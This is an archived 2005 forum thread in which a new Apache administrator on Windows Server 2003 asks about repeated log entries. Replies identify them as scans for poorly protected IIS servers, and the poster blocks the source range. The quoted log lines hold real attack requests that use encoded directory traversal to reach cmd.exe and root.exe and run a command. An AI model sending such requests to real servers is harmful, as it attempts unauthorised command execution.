Ever since I set up Apache2 on my Windows2003 server, I have been seeing these requests once a day. Never at the same time but approximately 24 hours apart and from different IP addresses. The requests are exactly the same each time, same order, same things they are looking for. Could these possibly be malicious in nature or could someone shed some light on the subject? I am relatively new to Apache but learning gradualy. They always result in 404 or 400 errors so I think its safe to say I am safe from this attack if it is one but I am still curious.
24.19.242.117 - - [31/Mar/2005:03:19:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
24.19.242.117 - - [31/Mar/2005:03:19:40 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290
24.19.242.117 - - [31/Mar/2005:03:19:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
24.19.242.117 - - [31/Mar/2005:03:19:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
24.19.242.117 - - [31/Mar/2005:03:19:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
24.19.242.117 - - [31/Mar/2005:03:19:41 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 347
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
24.19.242.117 - - [31/Mar/2005:03:19:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
Full Version: Apache on Windows 2k3 Log Questions
they look pretty malicious to me, like buffer overflow attempts. but then again I know 0 about Apache.
yep
those are attempts at badly shielded IIS servers
with apache, you don't really need to worry about those all that much. you can always block those IPs that attack you too
those are attempts at badly shielded IIS servers
with apache, you don't really need to worry about those all that much. you can always block those IPs that attack you too
Ive had somebody messing with my IIS servers before now.....my logs were like that too...
ChocIST
ChocIST
Thanks everyone. They all appear to come from a 24 address, so I just blocked the entire thing. I only have this up to access some things from work, so I don't really care for anyone else accessing it =)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.